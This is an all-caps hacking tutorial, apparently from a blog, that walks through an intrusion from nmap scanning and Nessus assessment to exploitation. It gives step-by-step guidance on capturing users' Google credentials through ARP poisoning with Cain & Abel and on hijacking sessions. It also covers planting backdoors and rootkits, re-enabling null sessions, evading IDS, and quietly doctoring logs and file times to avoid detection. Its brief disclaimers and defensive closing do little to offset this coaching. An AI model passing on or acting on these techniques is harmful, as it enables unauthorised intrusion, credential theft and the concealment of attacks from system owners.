NOW LETS GET DEEPER! BY NOW WE HAVE DETERMINED WHAT NODES ARE RUNNING UP ON THE NETWORK. SO WE ARE READY TO GATHER LARGE INFO ON THOSE LIVE SYSTEMS WE DISCOVERED IN THE PREVIOUS STEPS. OK! NOW YOU NEED TO DISCOVER WHAT SERVICES (APPLICATION) ARE RUNNING ON YOUR TARGET’S HOST. EVERY (OR AT LEAST MANY) PORT HAS A SERVICE RUNNING ON IT. FOR EXAMPLE, WEB SERVER USUALLY ARE RUNNING ON PORT 80. WHAT WE HAVE TO DO IS SCAN PORTS, SEE WHAT KIND OF SERVICES(APPLICATIONS) ARE RUNNING ON THEM, TRY TO GRAB THE VERSIONS OF THE SERVICES, THIS WILL HELP YOU TO DETERMINE THE OS AS WELL. THIS IS CALLED ‘PORT & SERVICE ENUMERATION(FINGERPRINTING)’. WE HAVE TO DO THIS STEP TO UNDERSTAND WHAT POTENTIAL VULNERABILITIES YOUR TARGET HAS & HOW TO EXPLOIT THEM.

ASSUME AFTER WE HAVE SCANNED OUR TARGET SYSTEM, WE FOUND OUR TARGET RUNS “IIS 5.0 SERVER” ON “PORT 80”. BASED ON THE SCANNING RESULT, YOU CAN SAY THE TARGET SERVER IS RUNNING IIS 5.0(IIS IS SET OF INTERNET-BASED SERVICES, IIS IS THE SECOND MOST POPULAR WEB SERVER – IIS IS A MICROSOFT PRODUCT), IT IS KNOWN IIS 5.0. HAS TOO MANY VULNERABILITIES & IIS 5.0 RUNS ON WINDOWS 2000, WHICH WINDOWS 2000 BY ITSELF HAS HUNDREDS OF VULNS.

IN OTHER WORDS, LETS SCAN PORTS AND SERVICES, AND DO OS FINGERPRINTING, LETS IDENTIFY SERVICES ON THOSE LIVE HOST IN OUR TARGET NETWORK. ONCE WE KNOW WHAT SERVICES ARE RUNNING AND WHAT OS ARE RUNNING THEN WE CAN START EXPLOITING THESE SERVICES! – ‘PING/PORT/SERVICE’ SCANS ARE FREQUENTLY RUN TOGETHER USING THE SAME TOOL.

NOTE: IDENTIFYING PORTS & SERVICES IS THE MOST CRITICAL PART IN HACKING … PERIOD

OS FINGERPRINTING IS USED FOR DETERMINING OS TYPE AND VERSION, THEN WE EXPLOIT VULNERABILITY. THAT RESIDES INTO THE OS. WHEN YOU FINGERPRINT A TARGET, YOUR TARGETS’ OS CAN BE KNOWN FROM THE TCP/IP STACK, SO FINGERPRINTING HAPPENS ON TCP/IP STACK. WHY? BECAUSE EACH OS HAS A UNIQUE IMPLEMENTATION OF TCP/IP, SO TCP/IP STACK IS IMPLEMENTED DIFFERENTLY FROM OS TO OS, SO AN EXACT SAME QUERY SENT TO ONE MACHINE THE RESPOND OF THE RESULT WILL BE DIFFERENT THAN THE OTHER MACHINE. THEREFORE, BASED ON THE RESPONSE THIS CAN HELP THE SCANNER DETERMINES THE OS OF THE TARGET, BECAUSE EVERY OS HAS ITS OWN UNQIUE RESPONSE WHEN YOU DO OS FINGERPRINTING REQUEST.

WHEN YOU DO A DEFAULT INSTALL OF OS, CERTAIN SERVICES WILL BE INSTALLED BY DEFAULT, SERVICES THAT ARE NEEDED FOR THAT OS TO WORK PROPERLY, E.G. PORTS
137,138,139,AND 445 WHICH ALL COMBINED TOGETHER TO PRODUCE WIN 2000 OS OR ABOVE. ANOTHER EXAMPLE, A COMBINATION OF 139 AND 445 CAN DETERMINE A CERTAIN VERSION OF WINDOWS SUCH AS WIN XP OR WIN 2003, THERE ARE LOTS OF WAYS TO DETERMINE OS. ANOTHER EXAMPLE, IF YOU SEE A SERVICE MS SQL IS RUNNING ON A CERTAIN PORT, YOU CAN DETERMINE THE TARGET OS IS NOT IN *NIX FAMILY, IT IS IN A WIN FAMILY CAUSE THE TARGET IS RUNNING A MICROSOFT SQL PRODUCT. THUS, WE CAN SAY PORT ENUMERATION OR SERVICE ENUMERATION CAN HELP YOU IN DETERMINING OS.

THERE TONS OF POPULAR SCANNERS OUT THERE:
SUPERSCAN – WORKS GOOD ON WIN OS.
NMAP – WORKS ON *NIX & WINDOWS, *NIX VERSION IS MUCH MORE STABLE THAN WIN VERSION.

MOST SCANNERS OFFER FULL, HALF, STEALTH, AND UDP SCANS.

YOU ARE GOING TO SPEND MOST OF YOUR TIME SCANNING YOUR TARGET MACHINE TO KNOW WHATS AVAILABLE THERE, SO YOU CAN EXPLOIT THE VULNERABILITY & PENETRATE THE SYSTEM. THEREFORE, YOU HAVE TO DO SOME EXPLORATION ON SCANNING METHODS & DECIDE WHICH METHOD OF SCANNING YOU FEEL MORE COMFORTABLE WITH…

LETS SEE AN EXAMPLE OF ENUMERATION STYLE SCANNING. JUST KEEP IN MIND, THIS CAN BE CONSIDERED HACKING! MAKE SURE YOU DO TO YOUR SYSTEM, NOT SOMEBODY’S ELSE.

THIS IS KIND OF A STEALTH SCAN:
NMAP -V -SS -A -SV XX.XXX.XX.XX > FILENAME

THIS ABOVE REQUEST GIVES YOU VERY SPECIFIC DETAILS ABOUT YOUR TARGET. SV IS FOR VERSION INFORMATION IDENTIFICATION. CHECK OUT THE MANUAL TO KNOW WHAT THESE FLAGS DO – TYPE “MAN NMAP” TO SEE THE MANUAL…

ALRIGHT, AFTER WE HAVE FINGERPRINTED SERVICES & OS, NOW ITS THE TIME TO CHECK FOR VARIOUS VULNS AGAINST APPLICATION(SERVICES) & OS RUNNING ON THE TARGET SYSTEM. THIS IS CALLED VULNERABILITY ASSESSMENT. TO DO VULNERABILITY ASSESSMENT, YOU CAN USE THE TOOLS AVAILABLE, SUCH AS NESSUS. NESSUS IS FREE VULNERABILITY ASSESSMENT, HUGE DATABASE, ITS THE BEST ASSESSMENT TOOL.

LETS SCAN VULNERABILITY ON THE TARGET SYSTEM. LETS SAY TARGET SYSTEM IS WIN 2000 SP1 IIS 5.0, NESSUS GOES BACK TO ITS DATABASE AND CHECK THE VULNERABILITY FOR WIN2000 & IIS 5.0. IF THERE IS VULNS NOT DISCOVERED, VULNERABILITY ASSESSMENT TOOL ACTUALLY CAN’T VULNERABILITY IT. HOWEVER, IF NESSUS COULDN’T FIND MATCHING VULNERABILITY FOR THE TARGET SYSTEM, IT WILL LET YOU IF THE SYSTEM CAN HAVE SOME SECURITY ISSUES OR NOT. SUCH TOOLS ARE CONSIDERED AS AUTOMATED VULNERABILITY ASSESSMENT TOOLS. YOU HAVE TO KNOW ABOUT THE TARGET SYSTEM OS SO YOU CAN DO VULNERABILITY ASSESSMENT ON IT. THERE ARE VULNERABILITY ASSESSMENT OS SPECIFIC, E.G. MBSA TOOL(ONLY SCANS WIN OS).

NOTE: YOU CAN DO VULNERABILITY ASSESSMENT MANUALLY, THIS DEPENDS ON YOU AND YOUR SKILLS. BY DOING IT MANUALLY, YOU CAN DISCOVER VULNERABILITY . THAT NOBODY KNOWS ABOUT IT, AND YOU CAN USE IT FOR YOUR OWN USE. IT IS A POWERFUL AND VERY DISCRETE.

AFTER WE DETERMINED WHAT SYSTEMS & WHAT SERVICES CONTAIN VULNERABILITY, THEN WE CAN EXPLOIT IT(MEANS TAKE A CHANCE OF THIS VULNERABILITY TO ACHIEVE WHAT YOU WANT).
COMMON VULNERABILITIES OUT THERE ARE:

OS VULNERABILITIES
WEBSERVER VULNERABILITIES
DATABASE VULNERABILITIES
TCP STACK VULNERABILITIES
APPLICATION VULNERABILITIES

MALWARES, VIRUSES, TROJANS, CAN BE USED TO EXPLOIT VULNERABILITIES.

THERE ARE SEVERAL AUTOMATED VULNERABILITY SCANNERS, SUCH AS NESSUS, NIKTO. SECURITY WEBSITES IS A GOOD RESOURCE FOR VULNERABILITIES AS WELL, E.G.
BUGTRAQ, CVE(COMMON VULNERABILITIES AND EXPOSURES) SITES, ETC. ANOTHER GOOD SOURCE TO FIND VULNERABILITIES IS HACKER WEB SITES.

LETS TALK ABOUT THE TOOLS:

*NESSUS – THIS IS A GREAT VULNERABILITY ASSESSMENT TOOL. HOWEVER, IN ALOT OF CASES IT WILL PERFORM EXPLOITS TO SEE IF THE OS OR SERVICE IS ACTUALLY VULNERABLE OR NOT.

*METASPLOIT FRAMEWORK – THIS IS NOT VULNERABILITY ASSESSMENT TOOL. IT IS AN EXPLOITATION TOOL, IT CONTAINS HUNDRANDS OF EXPLOITS HELPS YOU TO EXPLOIT THE SYSTEM BY USING A NICE SELECTION OF TOOLS.

I WILL EXPLAIN SHORTLY ABOUT THE COMMON VULNERABILITY …

OS VULNERABILITY : OS EXPLOITS ARE USED TO GAIN ACCESS TO THE SYSTEM. OS EXPLOITS CAN USED FOR DOS ATTACKS TOO. WATCH THE VIDEO TUTORIAL. MOST OS HOLES EXIST FROM DEFAULT CONFIGURATION, SERVICES AND APPLICATIONS.

WEB SERVER VULNERABILITIES: WEB SERVERS ARE THE MOST TARGETED SECTION. ALL PEOPLE CONTACT THE WEB SERVER, THUS YOU NEVER KNOW THE HACKER THAN A NORMAL USER. WEB SERVERS EXAMPLES, APACHE, IIS, AND TOMCAT. AFTER YOU EXPLOIT THE VULNERABILITY IN YOUR TARGET WEB SERVER, YOU CAN GAIN MANY DIFFERENT THINGS, SUCH AS ROOT ACCESS(THE GIST), WEBSITE DEFACEMENT, DOS(PUT THE SERVER DOWN), THEFT OR ALTERATION DATA ON SERVER, OR FURTHER PENETRATION INTO THE NETWORK.
WEB SERVER IS A GREAT PLACE TO START WHEN YOU WANT TO DO A PENETRATION TEST!

DATABASE VULNERABILITIES: THOSE SOFTWARE VENDORS WHO CREATE DATABASES APPLICATIONS SUCH AS SQL, ORACLE, ETC – THEY DON’T HAVE SECURITY IN MIND, THEY CARE MORE INTO EFFICIENCY AND HOW TO MAKE IT EASY FOR THE USERS TO HANDLE WITH THE DATABASE. THEY CARE ABOUT MAKING THEIR CUSTOMERS HAPPY WITHOUT GIVING THAT MUCH ATTENTION IN SECURITY ISSUES!

TCP STACK VULNERABILITIES: THIS IS NOT A COMMON USED METHOD TO HACK SYSTEMS. GOOGLE IT!

APPLICATION VULNERABILITIES: SOME EXAMPLES OF APPLICATION VULNERABILITY, BUFFER OVERFLOW, WEAK AUTHENTICATION MECHANISMS, POOR DATA VALIDATION(THE MOST COMMON ONE), AND POOR ERROR CHECKING.

ALRIGHT, TO DISCOVER THESE VULNERABILITIES ON THE TARGET MACHINE YOU NEED TO DO VULNERABILITY ASSESSMENT. THIS CAN BE DONE IN TWO WAYS, MANUALLY OR AUTOMATICALLY. MANUALLY MEANS YOU TRY TO DISCOVER A VULNERABILITY . BY YOURSELF WHICH EVENTUALLY YOU WILL HAVE VULNERABILITY . THAT NOBODY ELSE KNOWS IT & YOU CAN USE IT FOR YOURSELF OR PUBLISH IT TO SECURITY SITES. AUTOMATICALLY MEANS YOU RELY ON A TOOL THAT SEARCHES FOR VULNERABILITY IN THE TARGET MACHINE, THIS TOOL HAS A DATABASE FULL OF VULNERABILITY . SO THIS ‘TOOL’ WILL ONLY INFORM YOU THE VULNERABILITY FOUND IN THE TARGET MACHINE BY RELYING ON ‘ITS’ DATABASE. WE ARE GOING TO TALK ABOUT AUTO VULNERABILITY ASSESSMENT. THE MOST COMMON & WONDERFUL TOOL IS NESSUS, ITS FREE OPEN SOURCE CODE!

A LOT OF COMMON SENSE COMES INTO PLAY WHEN ANALYZING VULNERABILITY , FOR EXAMPLE YOU DO NOT LOOK FOR A DATABASE VULNERABILITY IN A WEB SERVER, THINGS LIKE THAT. ANOTHER RESOURCES, OVAL – GIVES YOU A GOOD AND BASIC FOUNDATION OF VULNERABILITY ASSESS. METHODOLOGY, FRIST – KEEPS TRACK OF VULNERABILITY AND MAKE EXPLOITS OF THESE VULNERABILITY , YOU CAN JOIN A PAID SUBSCRIPTION AND THEN BROWSE VULNERABILITY AVAILABLE IN THEIR DATABASE AND DOWNLOAD EXPLOITS THIS IS A GOOD SOURCE FOR HACKING OR SECURITY, AND WEBSITES FOR POSTING EXPLOITS SUCH AS MILW0RM, HACKING SITES.

LETS HAVE A CLOSER LOOK AT NESSUS TOOL, NESSUS IS CLIENT/SERVER ARCHITECTURE. THE PROCESS OF SETTING IT UP IS CUMBERSOME. NESSUS HAVE ABOUT 9000 PLUGGING, THEREFORE IT TAKES TIME TO PERFORM THE ASSESSMENT. RESULTS CAN BE REVIEWED IN A REPORT. THE REPORT INCLUDES THE VULNERABILITIES FOUND ON THE TARGET MACHINE WITH A SHORT DESCRIPTION ABOUT THE VULNERABILITY.

NOTE: YOU CAN ENABLE SEVERAL PLUG-INS IN PLUGIN TAB. YOU CAN SPECIFY RANGE OF PORTS THROUGH SCAN OPTIONS. TO SPECIFY THE TARGET, YOU SHOULD GO TO THE TARGET TAB.

ONCE WE HAVE DONE THE VULNERABILITY ASSESSMENT, AND KNEW WHAT VULNERABILITIES EXIT. WE START GATHERING EXPLOITS OF THE FOUND VULNERABILITIES TO PENETRATE THE SYSTEM.

LETS TALK ABOUT PENETRATION AND ACCESS! AFTER ALL INFORMATION WE HAVE GATHERED PREVIOUSLY, ITS THE TIME TO BREAK THE SYSTEM WITH THE EXPLOITS YOU HAVE.

ITS THE TIME TO STOP GATHERING INFORMATION AND START BREAKING INTO SYSTEM. THE ULTIMATE GOAL IS TO GAIN THE HIGHEST LEVEL OF PERMISSIONS. TRY TO USE UNDISCOVERED TECHNIQUES AND METHODS. THINK OUT OF THE BOX!
SOME OF EXPLOITS THAT ENABLE PENETRATION ARE:

*BUFFER OVERFLOWS
*STACK EXPLOITS
*WEB VULNERABILITIES
*SERVICES/APPS THAT ALLOW UNAUTHENTICATED ACCESS.

ASIDE FROM THE STANDARD METHODS OF PENETRATION, LETS SEE AN PENETRATION METHODS, HERE ARE SOME EXAMPLES:

*SQL INJECTION – ABILITY TO CHANGE QUERIES IN THE APPLICATION BEFORE ITS SENT INTO DATABASE.

*APPLICATION ERROR HANDLING – THIS CAN RESULT DOS. PROBABLY ONE OF THE MOST COMMON VULNERABILITY YOU CAN FIND IN CORPORATE ARENAS.

*DIRECTORY TRAVERSAL – BROWSE DIRECTORIES YOU SHOULD NOT BE ABLE TO DO SO ON.

*MALFORMED PACKETS – ONE OF THE MORE DIFFICULT METHODS OF PENETRATION, REQUIRES VERY EXTENSIVE KNOWLEDGE OF HOW TCP PACKETS ARE ASSEMBLED AND DISASSEMBLED. BUT ONCE YOU GET USED TO IT, ITS PROBABLY THE MOST EFFECTIVE WAYS OF HACKING.

*BYPASSING ACCESS CONTROLS – PASSWORD CRACKING IS MOST COMMON MEANS OF ACCESSING SYSTEMS.

*SOCIAL ENGINEERING – I GUESS YOU KNOW WHAT IT MEANS.

*SNIFFERS – TAKE PASSWORDS RIGHT OFF THE WIRE, A LOT OF PROTOCOLS AND APPLICATION SUCH AS HTTP & FTP COMMUNICATE PASSWODS OVER THE WIRE IN PLAIN TEXT.

*SESSION HIJACKING – IT IS SIMILAR TO SNIFFERS, BUT YOU DON’T GAIN A PASSWORD BECAUSE WE TAKE OFF THE ENTIRE SESSION, HIJACK THE VICTIM’S SESSION & ACT AS YOU ARE HIM.

USUALLY WHEN YOU GET PASSWORDS, YOU GET IT ENCRYPTED, OR HASHED OR HIDDEN IN SOME WAY OR ANOTHER. PASSWORD CRACKING CAN BE DONE IN SEVERAL WAYS, EXAMPLES:

*BRUTE FORCE ATTACK – EVERY PASSWORD, CAN AND WILL BE BROKEN BY BRUTE FORCE ATTACK. IT IS ABOUT THE TIME. DEPENDS ON THE SIZE OF THE PASSWORD.

*DICTIONARY ATTACK – LESS EFFECTIVE THAN BRUTE FORCE, RELIES ON LIST OF WORDS OR PHRASES.

*HYBRID ATTACK – COMBINATION OF DIFFERENT TOOLS. IT IS A COMBINATION OF EFFECTIVENESS OF BRUTE FORCE AND DICTIONARY ATTACKS & OFTEN USING OTHER ATTACK MECHANISMS, SUCH AS CRYPTANALYSIS ATTACK (ONE OF THE HYBRID ATTACK).

YOU SHOULD KNOW THAT WHEN YOU DO SNIFFING, YOU OFTEN GET USERNAMES & PASSWORDS IN PLAIN TEXT. HOWEVER, YOU CAN GET ENCRYPTED PASSWORDS FROM SNIFFING AS WELL. YOU WILL NEED TO USE OF THE CRACKING TECHNIQUES DISCUSSED ABOVE. SOMETIMES CRACKING AN ENCRYPTED PASSWORDS CAN TAKE SECS, HOURS, DAYS, MONTHS, OR EVEN MORE!!!

THERE IS A GREAT SOFTWARE CALLED “CAIN & ABEL”, IT SNIFFS PASSWORDS FROM THE WIRE, CRACKS IT, ETC. ONCE YOU INSTALL IT, GO TO SNIFFERS TAB, THEN MOVE TO THE FOUND PASSWORDS IN CRACKER TAB TO SEE WHAT YOU HAVE GOT! THERE IS LOTS TO IT. YOU SHOULD KNOW THESE TECHNIQUES AS A SECURITY PERSON CAUSE IF YOU DON’T KNOW IT, A BLACK HAT WILL TAKE CARE OF IT.

NOW, ASSUME WE ALREADY HAVE HACKED THE SYSTEM. WE WILL TRY TO DO DIFFERENT THINGS, SUCH AS GETTING THE ROOT, ETC. PENETRATION & COMPROMISE GOT SOME DIFFERENCES IN THE MEANING. HACKING INTO SYSTEM DOES NOT MEAN YOU HAVE COMPROMISED(TAKING THE FULL CONTROL – TAKE OVER) THE SYSTEM. AFTER YOU PENETRATE THE SYSTEM, YOU CAN GRAB THE SESSION BETWEEN CLIENT AND SERVER, E.G. YOU KEEP LISTENING ON LOGIN SESSIONS, SO WHEN THE REMOTE USER LOGIN TO GOOGLE, THE SESSION BE DROPPED TO YOU, ONCE YOU GET THE SESSION, THE REMOTE USER WON’T BE ABLE TO GET INTO HIS ACCOUNT HE/SHE WILL SEE AT PAGE GOES BLANK(DISCONNECTED), SO HE/SHE MAY THINK ITS A PROBLEM IN A CONNECTION, THUS HE/SHE TRIES TO LOGIN AGAIN & EVERYTHING WORKS FINE! BUT YOU ALREADY GOT HIS SESSION, YOU WON’T HAVE TO GO THROUGH LOGIN PAGE WHEN YOU WANT TO SEE HIS/HER EMAIL INBOX, CAUSE ITS ALREADY AMONG THE WHOLE SESSION YOU HAVE TAKEN.

ANOTHER WAY TO DO THIS, LETS SAY THE ATTACKER HAS COMPROMISED THE USER’S SYSTEM, THUS THE ATTACKER CAN LET THE SESSION DROP ON HIS MACHINE, THEN HE TAKES THE SESSION, READS AND SAVES IT. AFTER THAT, HE REDIRECTS THE USER TO THE SERVER, THIS STEP WILL MAKE EVERYTHING WORKS OK LIKE NOTHING WRONG HAPPEN.

LETS SEE AN EXAMPLE OF THE ABOVE EXPLAINED STEPS, AFTER ATTACKER INSTALLS “CAIN & ABEL” APPLICATION, HE MOVES TO “ATTACK BASE SYSTEM” & CLICK THE SNIFFER BUTTON AT THE TOP & CLICK THE YELLOW BUTTON(APR POISONING BUTTON) BESIDES THE SNIFFER BUTTON. THIS APR POISING BUTTON TRICK THE ATTACKED SYSTEM TO TALK TO THE ATTACKER INSTEAD OF NORMALLY WHO IT TALKS TO. FOR TESTING PURPOSES, GO AND ADD VARIOUS SYSTEM ADDRESSES(IP’S) TO THE LIST. LET SAY ONE OF THE USER AMONGST THOSE TARGETED IP’S LOGON INTO ‘GOOGLE’, AT THE AUTHENTICATION PROCESS YOU WILL NOTICE VARIES PIECES OF INFO COMES TO YOU. YOU ARE GATHERING INFO BY GETTING INTO THE MIDDLE OF THE COMMUNICATION PROCESS. NOW VIEW THE FILES YOU HAVE GOT IN THE LIST, YOU CAN SEE AMONG THE LINES THE USERNAME & PASSWORD OF THE USERS’ ‘GOOGLE’ ACCOUNT IN PLAIN TEXT! SO HOW DANGEROUS THIS CAN BE TO YOUR PRIVACY :-/! SO BE CAREFUL….
ONCE THE HACKER GAINS ACCESS TO THE SYSTEM. HE AIMS FOR ADMIN(ROOT) ACCESS. HE MOVES UP FROM GUEST LEVEL, TO USER LEVEL, UP TO ROOT LEVEL. OWNING THE BOX, MEANS TAKE THE SYSTEM & PREVENT THE ADMIN FROM CONTROLLING THE SYSTEM, AS WELL AS PREVENTING OTHER HACKERS FROM GETTING IN. SO YOU HACKERS USUALLY MOVE ON FROM THE REGULAR LEVEL, TO THE ADMIN LEVEL SO THEY CAN HAVE FULL CONTROL. A HACKER NEEDS PRIVILEGE ESCALATION TO COMPROMISE THE SYSTEM WELL. SOME EXPLOITS ALLOW BUFFER/STACK OVERFLOWS TO OBTAIN ADMIN ACCESS. ALL IT TAKES IS A GUEST USER, THEN A HACKER CAN PERFORM EXPLOITATIONS LOCALLY & THERE HE GOES TO THE ROOT.

AT THIS POINT, WE DID EVERYTHING UP TO OWNING THE BOX. NOW OUR GOAL IS TO PROTECT OUR ACCESS. THUS, WE WANT TO MAINTAIN OUR ACCESS TO THAT HACKED SYSTEM, SO WE CAN USE IT LATER. YOU CAN MAINTAIN A SYSTEM BY USING SUCH TOOLS, BACKDOOR ACCOUNTS, BACKDOOR SOFTWARE PROGRAMS, ROOTKITS, ETC. THESE TOOLS HELP YOU MAINTAIN ACCESS. SOME HACKERS OWN THE BOX CLOSE ALL OTHER ACCOUNTS EXCEPT HIS ACCOUNT, SO THE SECURITY PERSON SHUT THE SYSTEM DOWN, REFORMAT THE SYSTEM AND START OVER AGAIN.

BY DOING THIS, HACKER ACCOUNT WILL BE GONE. ONCE WE ENSURE WE HAVE MAINTAINED OUR ACCESS TO THE SYSTEM, THEN WE WANT TO EXPAND OURSELVES TO OTHER PARTS OF THE NETWORK. REMEMBER, IF YOU DO NOT DO THIS ON YOUR OWN NETWORK, SOMEBODY ELSE WILL TAKE CARE OF IT. IF HE DOES, I DO NOT THINK YOU WILL BE TOO HAPPY! ONCE YOU GOT AN ACCESS, AND COULD MAINTAIN IT SUCCESSFULLY. YOU WANT TO PREVENT DETECTION OR LOSS OF ACCESS. THERE ARE SEVERAL METHODS TO MAINTAIN ACCESS, SUCH AS ROOTKITS, OS EXPLOITS, ERASE TRACKS, INSTALL TROJANS THAT MAKE YOU ACCESS BACKDOOR, ENABLE NULL SESSIONS (WEBMASTER USUALLY GO TO THE REGISTRY & DISABLE NULL SESSIONS TO KEEP THAT VULN. FROM BEING EXPLOITED, WEBMASTERS USUALLY DO IT ONCE & DO NOT GET BACK TO IT. YOU CAN GO THERE & ENABLE IT – NOTE: BY ENABLING NULL SESSIONS YOU CAN GIVE OTHER HACKERS A CHANCE TO HACK TOO), AND MANY MORE.

THERE DIFFERENT WAYS OF SYSTEM COMPROMISE, SYSTEM COMPROMISE USUALLY DEPENDS ON YOUR GOAL, EXAMPLES OF SYSTEM COMPROMISING ARE ROOT ACCESS(ULTIMATE GOAL), DATA ACCESS/THEFT, DOS, AND MANY MORE. KEEP IN MIND, COMPROMISED SYSTEMS CAN BE DETECTED AFTER A WHILE.

NOW AFTER A HACKER BREAKS INTO THE SYSTEM, HE TRIES TO PROTECT WHAT HE HAS HACKED & ERASE HIS TRACKS. DURING THE ATTACK PROCESS TRY NOT TO BE DETECTED SO THE WEBMASTER DON’T SHUT THE SERVER OFF, AS WELL AS DO NOT FORGET TO ERASE YOUR TRACKS, E.G. YOU DONT WANT THE WEBMASTER TO SEE LOTS OF FAILED LOGON IN THE LOG FILES, SO YOU ERASE TRACKS TO PREVENT FUTURE DETECTION. TYPICALLY, GET IN THE NETWORK AS A SHADOW OR GHOST.

THERE ARE MANY METHOD TO EVADE THOSE IDS SO THEY DON’T CUT OFF YOUR ATTACK STREAM. COMMON METHODS FOR EVADING DEFENSES MIGHT BE BY FRAGMENTING PACKETS(SOME PROGRAMS DO THAT E.G. FRAGROUTE), PORT REDIRECTORS, ENCODERS(CHANGE THE FLOW, THE LOOK, AND FEEL OF VARIOUS TRAFFICS TO PASS FIREWALL). AFTER YOU GET IN AND DECEIVE DEFENSES, YOU WANT TO GO TO THE LOG FILES AND ERASE YOUR TRACKS. REMEMBER: SOMETIMES YOU GET IN A USER ACCOUNT THEN YOU GET INTO A ROOT BY CHANGING PERMISSIONS OF THE USER ACCOUNT, SO YOU HAVE TO REMEMBER TO SET THIS USER PERMISSIONS BACK TO AS IT WAS, THINGS LIKE THAT – YOU KNOW WHAT I MEAN, PUT YOURSELF IN A HACKERS SHOE. DON’T DELETE THE WHOLE LOG FILES, THIS CAN MAKE THE SECURITY PERSON MORE SUSPICIOUS. WE WANT TO LEAVE EVERYTHING AS IT WAS SO NOBODY CAN GET A FEEL THAT AN INTRUDER WAS HERE.

TO BE SAFE, YOU SHOULD KNOW WHERE YOUR ACTIONS ARE RECORDED, DELETE LOG FILES AND OTHER EVIDENCES THAT CAN GET YOU CAUGHT, STEGANOGRAPHY (GOOGLE IT), AND EVADING IDS & FIREWALLS. ALL ACTIONS ARE RECORDED IN SOME PLACE ON THE SYSTEM OR THE NETWORK. ASSUME IDS DETECTS YOU, WHAT DO SECURITY PERSONS DO? USUALLY WHEN YOU GET DETECTED, THEY MAY CUT OFF ALL THE WAYS FOR YOU SO YOU DON’T GET A CHANCE TO PENETRATE, THEY PROBABLY GOING TRACK YOU DOWN, OR THEY MAY DECIDE LET YOU GO BUT WATCH YOU THE ENTIRE TIME.

WHERE ARE YOUR ACTIONS RECORDED & WHAT THINGS CAN LET SECURITY PERSON KNOWS THAT YOU HACKED HIS SYSTEM? THEY ARE RECORDED IN LOG FILES FOR VARIOUS APPLICATIONS(E.G. IIS & APACHE LOG FILES), FILE ACCESS TIMES(NOTE: THERE ARE TOOLS FOR HACKERS THAT ALLOW YOU TO MODIFY FILE ACCESS TIME), WINDOWS REGISTRY ENTRIES, HACKER TOOLS LEFT BEHIND (BE AWARE OF THE RESIDUAL CONFIGURATION YOU HAVE LEFT BEHIND – MAKE SURE YOU SET ALL THE CONFIGURATIONS BACK TO AS IT WAS), OS PERFORMANCE STATS, IDS, PROXY SERVERS(MAKE SURE HOW YOU SEND AND RECEIVE DATA. IF YOU ARE GOING TO USE PROXY SERVER, SET UP A PERMANENT TUNNEL THROUGH THE PROXY TO THE REMOTE HOST THAT IS COMPROMISED), AND FIREWALLS(USUALLY VERY RICH WITH LOGS).

THERE ARE VARIOUS TYPES OF IDS, IDS CAN SET ANYWHERE IN THE NETWORK. THERE ARE NETWORK BASED IDS, HOST BASED IDS, AND APPLICATION BASED IDS.

DELETING EVIDENCES OF YOUR HACK IS EXTREMELY DIFFICULT, IT REQUIRES YOU HAVE A VERY HIGH KNOWLEDGE OF THE SYSTEM YOU ARE TRYING TO COMPROMISE(ALL THE PRIOR STEPS WE DID, SUCH AS SCANNING, FOOT PRINTING, ETC WILL BE HANDY TO COMPROMISE THE SYSTEM). IT IS EASY TO COVER THE KNOWN LOG FILES, SUCH AS WEB LOGS, FIREWALL, IDS LOGS, ETC. HOWEVER, IT IS IMPORTANT TO KNOW HOW THE DEFAULT LOGS WORK. HIGHLY SKILLED HACKERS, STUDY THE TARGET WELL & TAKE THE TIME IN FINGERPRINTING & FOOTPRINTING EVERYTHING PROPERLY. IT MAY TAKE HIM UP TO ONE WEEK BEFORE HE HACKS THE TARGET, BUT WHEN HE PENETRATES HIS JOB IS DONE MORE SMOOTHLY & QUIETLY. UNLIKE, THE OTHER ONES WHO ARE JUST USING SOME TOOLS TO BREAK THE SYSTEM AS FAST AS POSSIBLE WITHOUT STUDYING THE TARGET WELL.

IT IS POSSIBLE TO DELETE LOG FILES! IT IS SIMPLE BUT USUALLY REQUIRES ADMIN ACCESS. SOME FILES/LOGS MAY BE DELETED AUTOMATICALLY WITH REBOOT. DON’T DELETE LOG FILES, IT BRINGS UP SUSPICION. IF YOU DO SO, THE SECURITY PERSON CAN INDICATES VERY CLEARLY THAT A HACKER BROKE INTO THE SYSTEM.

MOST COMMON WAY OF HIDING YOUR TRACKS IS BY USING A ROOTKIT. ROOTKIT IS SET OF TOOLS USED BY AN ATTACKER AFTER THE ATTACKER GETS THE ROOT-ACCESS TO SYSTEM. ROOTKITS CONCEALS(TO KEEP FROM BEING OBSERVED) ATTACKER ACTIVITIES ON THE HACKED SYSTEM. ONCE ROOTKIT SET ON THE SYSTEM, ITS PRACTICALLY IMPOSSIBLE TO RID OF IT BECAUSE ROOTKIT USES TECHNOLOGY, CALLED “HOOKS”, THAT USUALLY MOST OF THE TIME EMBED ITSELF INTO VARIOUS COMPONENTS OF OS & EFFECTIVELY THE OS GOING TO BE A TOASTER WHEN THE ROOTKIT IS ALL SET AND DONE. SECURITY PERSON HAS TO REBUILD HIS MACHINE WHEN ROOTKIT IS DETECTED AFTER WE PROPERLY INVESTIGATE IT.
STEGANOGRAPHY ITS ABOUT HIDING A FILE INTO ANOTHER FILE. LIKE HIDING A MALWARE INTO A NORMAL SOFTWARE WHICH MAKES IT DIFFICULT FOR FIREWALL OR AV TO DETECT THE MALWARE. THAT’S THE BASIC CONCEPT OF STEGANOGRAPHY. THERE ARE ALOT OF TOOLS OUT THERE ALLOW US TO HIDE FILES INSIDE ANOTHER FILES.

YOU CAN EVADE IDS & FIREWALLS BY USING RANDOM SLOW STEALTH SCANNING TECHNIQUE SO TRAFFIC GOES UNNOTICED, THIS TAKES LONGER TO SCAN BUT MAKES DETECTION MORE DIFFICULT. TRY TO USE NON-STANDARD TECHNIQUES, THINK OUTSIDE THE BOX.

REMEMBER: NOT EVERYONE OUT THERE IS A SECURITY EXPERT. TO SECURE YOUR SYSTEM WELL, YOU NEED TO PUT YOURSELF IN A HACKER SET OF MIND.

BY NOW, YOU HAVE LEARNED THE BASIC METHODOLOGY THAT HACKERS USE TO BREAK INTO THE SYSTEM. ANYHOW, LETS TAKE A CLOSER LOOK ON HACKING TECHNIQUES, SUCH AS ENCRYPTION, SQL INJECTION, SNIFFERS, AND MANY MORE.

